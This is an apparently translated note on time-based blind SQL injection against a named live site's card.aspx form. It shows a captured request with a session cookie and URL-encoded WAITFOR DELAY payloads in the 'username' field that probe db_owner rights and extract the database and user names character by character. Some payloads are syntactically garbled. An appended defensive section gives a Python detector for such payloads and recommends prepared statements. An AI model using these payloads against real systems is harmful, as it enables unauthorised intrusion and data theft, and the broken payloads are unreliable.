The basics of SQL injection will not be covered here; this is just a short note for later reference.

The captured request:

POST /card.aspx HTTP/1.1
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: ASP.NET_SessionId=2k32d0nwvrzpbg55qucudt3b
Host: www.cunlide.com
Connection: Keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

cardid=1&cardpwd=1&Submit2=1&username=pxnjodhe%27%3b%20waitfor%20delay%20%270%3a0%3a5%27%20--%20

Looking at the POST data, the injection is in the username parameter. URL-decoding the username value makes it obvious:

pxnjodhe%27%3b%20waitfor%20delay%20%270%3a0%3a5%27%20--%20

pxnjodhe'; waitfor delay '0:0:5' --

Time-based (latency) injection is judged by how long the page takes to respond, so the guessing is done by timing. For example, we can take the first character of db_name(), convert it to its ASCII code and compare it with numbers (using < and > is recommended). The comparison can use the bisection ("half-fold") method: first guess whether the first character is an uppercase or lowercase letter, using 91 as the boundary; a value less than 91 means an uppercase letter (A-F, possibly _ or -), a value greater than 91 means lowercase. The following statements serve as examples:

cardid=1&cardpwd=1&Submit2=1&username=pxnjodhe%27;if%20(0%3D(SELECT%20IS_MEMBER('db_owner'))%20waitfor%20delay%20%270:0:11%27%20--%20
// check permissions

cardid=1&cardpwd=1&Submit2=1&username=pxnjodhe%27;if(ascii(substring(db_name(),40%)>20%20waitfor%20delay%270:0:2%27%20--%20
// database name

cardid=1&cardpwd=1&Submit2=1&username=pxnjodhe%27;if(ascii(substring(user_name(),115%)>20waitfor%20delay%20%270:0:1%27%20--%20
// user name

The encoded form is recommended; if the encoded form does not work, try the unencoded form. If there are any mistakes, please correct them.
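The decoding step above (percent-encoded form body to the plain `waitfor delay` statement) is exactly what a server-side filter or log-review script needs to do before it can recognise this kind of payload. The following Python is an added example, not code from the original note: it decodes an application/x-www-form-urlencoded body, normalises each field, and reports any field that carries a T-SQL WAITFOR DELAY clause together with the delay it requests. The sample bodies are constructed for the example (the first mirrors the shape of the POST body shown above); the function names are my own.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample bodies: the first mirrors the shape of the injected
# request body shown in the note, the second is a benign submission.
INJECTED_BODY = (
    "cardid=1&cardpwd=1&Submit2=1&username="
    "pxnjodhe%27%3b%20waitfor%20delay%20%270%3a0%3a5%27%20--%20"
)
BENIGN_BODY = "cardid=1&cardpwd=1&Submit2=1&username=alice"

# T-SQL time-delay primitive: WAITFOR DELAY 'h:m:s'. The quote is optional in
# the pattern so that a payload sent without quoting is still recognised.
WAITFOR_RE = re.compile(
    r"waitfor\s+delay\s*'?\s*(\d{1,2}):(\d{1,2}):(\d{1,2})",
    re.IGNORECASE,
)


def decode_form(body: str) -> dict:
    """Decode a form-urlencoded body into {field: value}.

    parse_qs performs one round of percent-decoding; unquote is applied a
    second time so that a doubly-encoded value is also normalised before it
    is inspected (a literal '%' in legitimate data will be decoded too, which
    is acceptable for a detector).
    """
    fields = parse_qs(body, keep_blank_values=True)
    return {name: unquote(values[0]) for name, values in fields.items()}


def delay_seconds(value: str):
    """Return the delay requested by a WAITFOR DELAY clause, in seconds,
    or None when the value carries no such clause."""
    match = WAITFOR_RE.search(value)
    if match is None:
        return None
    hours, minutes, seconds = (int(g) for g in match.groups())
    return hours * 3600 + minutes * 60 + seconds


def scan_body(body: str) -> list:
    """Return (field, decoded_value, seconds) for every field of the body
    that contains a time-delay injection marker."""
    hits = []
    for name, value in decode_form(body).items():
        seconds = delay_seconds(value)
        if seconds is not None:
            hits.append((name, value, seconds))
    return hits


if __name__ == "__main__":
    for body in (INJECTED_BODY, BENIGN_BODY):
        print(body[:40] + "...", "->", scan_body(body))
```

Matching on the decoded value rather than the raw body is what makes the check robust against the encoded/unencoded variants the note mentions. A second, independent signal is response latency: a request whose processing time tracks the `h:m:s` value it carries is a strong indicator even when the payload is obfuscated. None of this replaces the real fix, which is to pass `username` to SQL Server as a parameter of a prepared statement so the string can never be executed as T-SQL.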